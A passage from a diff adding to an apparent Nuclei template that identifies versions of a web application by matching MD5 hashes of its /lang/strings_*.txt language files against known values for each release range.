"{{BaseURL}}/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.12.2 + dsl: + - "(\"ac693cbb5b74a060278e5bd0af3cdfd8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"d9dbf6747409671a8e069c247897873c\" == md5(body))" + - type: dsl + name: 2.0.0 - 
2.0.1 + dsl: + - "(\"f32622aa464fec2650b9fac270c8e125\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"76091614022ac67cfeb833878107c7ff\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"12011c541fb0c70a6ca66c89acb8b0c8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"00ab1c5f1dd0fac672871cd7151d6d4c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ff94feadfc9e6a393473f6deca3262a0\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"aec7464de540ea9805efc688878c941c\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"58f3bcd9d88a9e67fe15db3fbaf5ce70\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"27ea2fb05a87d10626997fb696181d60\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"004f5e110e319eaa63e68900755c920b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6011ea1e7161a3f0cf7c0f77e899c31f\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"869f22c6cc4b20402580b20a7b9e5a41\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"373ad10416fd0a76e5ea0449624dc5d4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"604f6e2737e526e6bbbbbc5f0a4a0ec7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"3fb350ca0540e159d5a28ed03236ceca\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"f4a992d27d5070f62507d6d6d74d2542\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0faa41cacfe7984b03b19c96a84cca22\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ad14c5717201ab154af49bf0023e125c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"833550c81f81ab0e799f2b59011f2447\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"4a7d49fee70a35e72299405d42f66365\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"f18fe7b1a17844169eee8417a3daa015\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/lang/strings_slovene.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.19.1 + dsl: + - "(\"42db18daf16cc408177471b41bc7d981\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"7581b3a8eb608f724817a77af328d05f\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"1229f3e10327476ed7a362eeed28c632\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"4b1814ed0c50fbfaf3b0a8b379322e2e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"74af22a5cd0ba1069314f1ecddf1e399\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"c7b3accd2b36f09cf116ddfdbd0af8d2\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"ceab2a0aec29cb6fd028a1ac763e4e0e\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"f4a516b44e6d3fb93be0d12639d1f7ad\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"410f083ba3471a8b0788ea4e7fd41c79\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"a8b3215e60e76794a35deaf9c22363fd\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"1e0de841c995c0d420709f7abd70132c\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"1508038752378fb37e630e8b0def3451\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"54d0cfadda5df7db8889dbf81b1b78d8\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ead94d9966aefbc87e9d2d2859ed4653\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"2bd7ea50a83eac587e37d1a3444d5b60\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"52ed6bd8be0dc9dd0e6bef208bb19798\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0009d96e69f6e479b8904100eabbd86f\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a2288b469cfacbd127de5e6acadb8f9a\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"a3fa9d0de10e04b77409f8a46c1212fe\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - 
"(\"159c8903c98e31ca543fe55298575c5c\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"3573850cdc7a297a791278441b68d067\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"c18b905af9975f24562866856a3bced5\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"3484989970b3866fdc0596d3994d07ad\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"4355b98caf8d4e513eb61bd2c5be8b19\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"3b88588e308fb2a73046b201d741d018\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"ae7a33d58c58e349286b36ead4bd1201\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"930e46be758990a638679182998f9963\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"0a131c14f132b9f2053555288b6e57ed\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"98ce4286ce811bc0a2a6ffe66b45f132\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"19152c26ae000ac8d8437499a8c38727\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1368ccb9b38067994751cc3b66f3ca92\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"fe23acb033c336b5d5a5e0f3423831f7\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"0411d5011634abe38386e3398a76ffc1\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"d5783eae9879aff2e5eed2ac7f08b0b4\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"9fddc8278bf82b64b5882e8d94b3c802\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"93a28335973ddd71ea7519b3c1c7cca3\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c82b4aae8b636af830c89cbf520de5ed\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a655355b9e6e88ea40206c294f41adf2\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - 
"(\"9998a6dadb2a643956a42bb6fe00ff78\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"e30185119bac28447d514e0f6ddd3e3d\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"9403cc07bcb496d2baf7c486190206f6\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"4f56f3035ca92df4e89e0d997dc9e0ce\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"cf0da95c03ae359b6be8295331d7d2c7\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"9f8974fc0069cc7fb7e5d77ed0498674\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"570c9e6e90d54a4966b691cc4b1e044c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"63eac1a79e093f05bd536b17735cf47c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"b4fc046963a9ef8eed18866c2f2e75a2\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"fa9b07ccb41b14bf45e5cddcf58fa342\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"995b9a4a0dfa159bb0a8b13fce85c03b\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"898d08ee9fc89ccc17b36aa4f462663f\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"067ca5dbf06b3604c23268fb33518584\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"60c279daea8bd43d8d5de429af64c339\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"725e2ffc4140d29523ecec1026919427\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"b6a09882e047c2299409ce9d6408a6e2\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ed46abef7cfd19a3d9235b3dc3ff68cc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.11.1 + dsl: + - "(\"e8a7bb6b0812bfd896088939e27b2440\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.4.2 + dsl: + - "(\"b1339c5d77e53795fc3e9c6f8a9434d0\" == md5(body))" + - type: dsl + name: 2.1.0 - 
2.1.3 + dsl: + - "(\"0046f4f35a9f5af9cc5363eb81e37e90\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"6b42a504042172688b94cb2d15e70403\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"45323bed7167c0a66be2c263b4ec7d01\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"d62e072cf197fd8a13bf650035cbac3f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"81d959db8864bdb7fb80cfbd92b85f6e\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d84cb97d285732dbba6e38d547b549d8\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"78a47c5ea7ebf7dc4d68634d723f0112\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"3a32a17d8096eff74a11b3b7ed08f0d3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"65940faf4f1ed448d446fb1e04cfe1c5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c2ca5ac8b318762e4d654c2b5697a3c8\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"4ff3043d388184067cecf6b51210a0c7\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"2251127aa5af1581315ef4933976aa1a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"4372eea8c1c7bf4508964d5ca49030fd\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"58cf78d1940ac2a4d717cef9792716bc\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"14cb1d84b25d4d615fe51b032d7bca7a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"a10ae51f9ce29c4f6210c31f21f4577a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"e4d029ac26f92bfb05018fda854215f9\" == md5(body))" + - type: dsl + name: 1.1.8 - 1.1.9 + dsl: + - "(\"b547f774353c4d76970b6b511221031d\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"1e5abc0b4e15086b78f568d8d74fd2bf\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"f2e231d885b33292d0089e9470c08ea5\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - 
"(\"dc42cfc94cdd54a69c8835656ecd3822\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"fa07cab5a3384a83bf258e69a1d4dcd5\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.18.1 + dsl: + - "(\"73b3c4fccc18a65394d60c42cd2fb5b7\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"a27fc42083bfc6b8e79ab8af93212b3a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"84f88e0f6875843ab2480d5d8128128f\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"aeb9fae8dd99470626d52d3f9e36f413\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"c268363230f41613bfbb6b199e7bc296\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"a0488e51a324848c3e5a7e3b91037481\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"e4ecd7cad8463f281795d04ce68acc17\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.10.1 + dsl: + - "(\"5fa2759e6353e800923d51383e8bd52a\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"89d2645f42f606a788c2d7ecd9d6d99b\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"f452fa3cd6f6d564882c555d7823edd7\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"66341f404b96e57f2d4addd87de0a053\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"b70308379635add800d19da0d8a16bed\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"7edb9d33f6e27ab75b44c0d5f85311ac\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"76e1aa99fb5e52089079bb4c7740111c\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"80c797eb27da8873f53ad64c4bec2902\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.3 + dsl: + - "(\"71df54a51fb194895db74bc044c81b72\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"b26fddec1431c4ebc50f3c1ba2fd4157\" == md5(body))" + - type: dsl + name: 1.2.17 + 
dsl: + - "(\"99e0896c980fe2e79c9139d3724cc74c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7ecfc1d103daaa8cee7be78277f3f791\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"5e17bc35e47506f6865765f8542d1ce9\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"2fe1ef2bd248ceefab76cfe0146e8678\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4d4d8cb68dd8dfbace58a5a44f49ac45\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"ecb76103897afd767794f527e286462d\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"5d30ca051a1f7e27fa3ab26c4304edd6\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"bbd5b14c7c047be72072acecd92c615c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"5da1a77bd42f9ed2b11c864728ed4ab6\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"f3f701ac89b1ec706c716a5985e6e5e6\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"388b26282962f7836624d20b982d2d95\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"644941c07507aea4dc0535722c3d0356\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"cae7409412645f6101597d23b1ca55a9\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"919a0478703a5c4a1fb91d2e62f069a2\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"f4e171557b3b6ba90a794be3af78b7a1\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"cfe87b008e527a9ec17cadf7cb8e9c5c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"eb539d9928639929a9cd60f7c30ea06b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"99ff4503f9368379b9a34ee8c655a676\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"0014aafaec01add2eac0e2c09513e08f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_bulgarian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - 
"(\"bb190ba6bf6ef54d95a6634589c47130\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"2c04f775ba8295d20a1492c1199400e9\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"24ef900809457ab175792f38d1c67a75\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"2f7427a677e4ee07c0f7d39b4ea88153\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"19136ecf4658cbc5d613e0c000f9dd64\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"3c2495b0087ff5f3335d16f2ed63843b\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"7d15e4dcaebcc543af15b5e661959ff6\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6a5ba3175735b8e7a1ca9768d48def64\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d2b31fe598fbd40b29db2340dbed22d3\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ba42bbcbce87eb8c991c435f916f7813\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"656b10af663f4fc89e08ba0f3d7773cb\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"d8c2574d547645973f37ca7023ad0c19\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"4d3bbd34d591ef2823d54939ad923e8f\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"54d81fa7bb34efaba036a239c78d111b\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"5ab54e691ce18693d840ab6f953c7dac\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"8ceca33a6f49f69dfaa2222abfd2d516\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"e69fbf62dfa7e30f3fe78a656b1b8c1a\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"9347b9cd16f923e55e26e2f613d6bf16\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"35787287ca4cd4a54d75c956d220b42b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"83ba950776ad148d0de669ccafd5472d\" == md5(body))" + - type: dsl + name: 1.1.9 + dsl: + - 
"(\"bb1b94e8a35b691ef094fec4e875e063\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.8 + dsl: + - "(\"8cd10e27be3f83e2d7a323f7b42da5ee\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"004998099dc9aea71b1484f503bfea64\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"91954b340298dec812763e0f7a4d8096\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"1a5e6b0652183d5c04815916e9fe8edd\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"8f1dbcdc9ad935e7c9841c9f6d99ce2a\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.9.1 + dsl: + - "(\"1bcd946df050fd7b27870b6211f32839\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"a374866a03b3bbb01a5508c3ee537d9f\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"49317fd04358cb56ca7b1a1a5ac1fbb4\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9ba475646bf0c35b2783075b769d879a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"22d20f4158fc7ba30de697b71bd486f4\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"37f7cd0db726e351c5fa3a3335eb5864\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"063d7775d2e33248f8e0b1730e53f88e\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"ec63f2a2ac7f55191390c698e00867d9\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"263235c622ec22eb5346f56615d541f7\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"b57c973d4488adf82ce63228b3529667\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"54356403f4f0e1eb5f4104f7f4706a77\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_finnish.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.10.1 + dsl: + - "(\"1ab7ed09900e815528a85cd010544e2a\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"4cc825732f61b7d2aaffdcc554c7ac1f\" == md5(body))" + - type: dsl + name: 
1.3.4 - 2.0.1 + dsl: + - "(\"59053b883a4ddbe9697c51cf68dd6f8e\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"06a1a513ad0ae3cdf3e55319b1e0fc6b\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"f74e30e2b6940fc2fde4a451f179f67f\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"2485a84fbbbc9a5f5fa951aa8064b509\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"10bc0a83f96f9fe71319048d8de197b2\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"7ed6a08d082cac8c1d0d73585f617be3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"8003b4fde70cabd837e7e2c5f327a1b5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"f65f840c36bcc2544af80053c1b5da23\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"bf74235a7ee415141bff04136b61fd57\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"68be85368d861f90b9fbde094743a2d5\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"b6946742e6e30676f2872618fda64e00\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"8f4fd5da96672e7488dd481344cfe044\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"591234e57c5695c371f818ff8ba61822\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"d812ffbf64ec4559d26dd3aad7fe7417\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4a9b23c583ad1fc4a033845ad7b21577\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"99cb487727606050d9b31393f2225702\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"c65f70aa850b186a12c77d34fd25ba6d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"e73d5f02aa62190db2c2282d2e5c8655\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"0c857dacd9fcf905d6e524a602e0fe32\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"9ab41a4bc0a958c1542e381ab6d95dc8\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - 
"(\"76452aa3feef5b338ff40c21f93014bb\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"11bbf7949aac71ce5c735296b2538631\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"ae1ca2bd18b1e8049819ef83b3c20d4c\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"9d73e3cdef1ef26e8ed6ef7ff2a1a72b\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"cd88f4f8de846981326c811d371e2068\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"45ef3548ddd5a1441157994538ea8b74\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"bf71ed0235e0ecbfa8a777922401ac37\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"62c23f1ae4598022dd0c16734850bc5c\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"bad885e81637b7aeb51c50d9b7b42508\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_lithuanian.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.10.1 + dsl: + - "(\"43aa69844f3f10e44151270c341227f6\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"512556883487fe334946c6a2149d3ee9\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"306156b854879024ad887c4e57281570\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"8d4181eb24bdb7bd4fd99a84f45e48ff\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"de312ed94957e7fb34e543fc00e43a78\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"2e1e270ef91a64aadaa2d0c790cd4d28\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"b2d69a7aa8630f5f9cbe75afbd33c1cf\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"d91ed458d7df1211111de8d107d00ae4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"507b1c068af9a2adce9b0d7f87a01c59\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"d90b46590d86b4c12a4da9803be946f9\" == md5(body))" + - type: dsl + name: 1.2.5 + 
dsl: + - "(\"045d3209282f39fcd9b8170314fbfb7f\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"80282020404d05c5bf17e2909508b40b\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"13f4aa0f71cf5145b488c9f2557cb57e\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"540723e70ccb0ddf0031f65339266c18\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"baa0257cebed328b0c81ff96ddcddad7\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"23d96f1bd61409b1f462b5f1baac6005\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"a092c454345342c98148c1418e77bd6b\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"bac705b7d7fe8175ab2485becb5f3ee7\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"68f08d63cc36cb99474bbaacb54d6762\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"87a710596bf4e1635406ce21ed3d0566\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"655d9dfd92496a115684117ddfa686aa\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"d8bc4456057b30e4987abb0d2d940d12\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"fc8c2164c573ddf4c8e03f4051862730\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"c1aa39979f0709cdebcf3eee11d17559\" == md5(body))" + - 